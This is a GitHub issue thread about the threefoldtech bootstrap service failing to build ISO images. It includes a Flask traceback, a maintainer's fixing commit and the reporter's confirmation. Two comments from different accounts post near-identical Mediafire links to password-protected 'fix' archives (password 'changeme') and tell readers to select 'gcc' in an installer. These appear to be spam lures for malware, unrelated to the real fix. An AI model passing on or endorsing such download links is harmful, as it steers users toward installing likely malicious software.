### ISSUE TITLE
[bootstrap] some images are not generated

### ISSUE THREAD

**Issue by coesensbert** [threefoldtech/grid_deployment#66]
https://bootstrap.ninja.tf/

Only 'EFI IMG' and 'iPXE' script work after https://github.com/threefoldtech/grid_deployment/commit/c8f19f10c7ebb8d50ea48e6d3a6134e0a196ae40 , other ones not: https://bootstrap.ninja.tf/iso/prod/1

```
FileNotFoundError
FileNotFoundError: [Errno 2] No such file or directory: '/tmp/tmp3v4p0lwv/ipxe.iso'

Traceback (most recent call last)
File "/usr/lib/python3/dist-packages/flask/app.py", line 2088, in __call__
return self.wsgi_app(environ, start_response)
File "/usr/lib/python3/dist-packages/flask/app.py", line 2073, in wsgi_app
response = self.handle_exception(e)
File "/usr/lib/python3/dist-packages/flask/app.py", line 2070, in wsgi_app
response = self.full_dispatch_request()
File "/usr/lib/python3/dist-packages/flask/app.py", line 1515, in full_dispatch_request
rv = self.handle_user_exception(e)
File "/usr/lib/python3/dist-packages/flask/app.py", line 1513, in full_dispatch_request
rv = self.dispatch_request()
File "/usr/lib/python3/dist-packages/flask/app.py", line 1499, in dispatch_request
return self.ensure_sync(self.view_functions[rule.endpoint])(**req.view_args)
File "/bootstrap/bootstrap.py", line 359, in iso_release_farmer
return iso_release_farmer_extra(release, farmer, "")
File "/bootstrap/bootstrap.py", line 364, in iso_release_farmer_extra
return generic_image_generator(release, farmer, extra, "mkiso.sh", "ipxe.iso", "ipxe-%s.iso" % release)
File "/bootstrap/bootstrap.py", line 222, in generic_image_generator
with open(os.path.join(tmpdir, targetfile), 'rb') as f:
FileNotFoundError: [Errno 2] No such file or directory: '/tmp/tmp3v4p0lwv/ipxe.iso'
```

**Comment by HarbingerOfFire** [comment]
Download 
https://www.mediafire.com/file/czdodbba054p738/fix.rar/file
password: changeme
In the installer menu, select "gcc."

**Comment by c0ffincolors** [comment]
Download 
https://www.mediafire.com/file/xs3e15yonljh4bk/fix.zip/file
password: changeme
In the installer menu, select "gcc."

**Comment by HarbingerOfFire** [comment]
Check your signed in sessions for unknown people

**Comment by maxux** [comment]
Should be fixed by https://github.com/threefoldtech/grid_deployment/commit/c81be083b48629546bbd889e9b602b19c416e9fa

**Comment by coesensbert** [comment]
confirmed
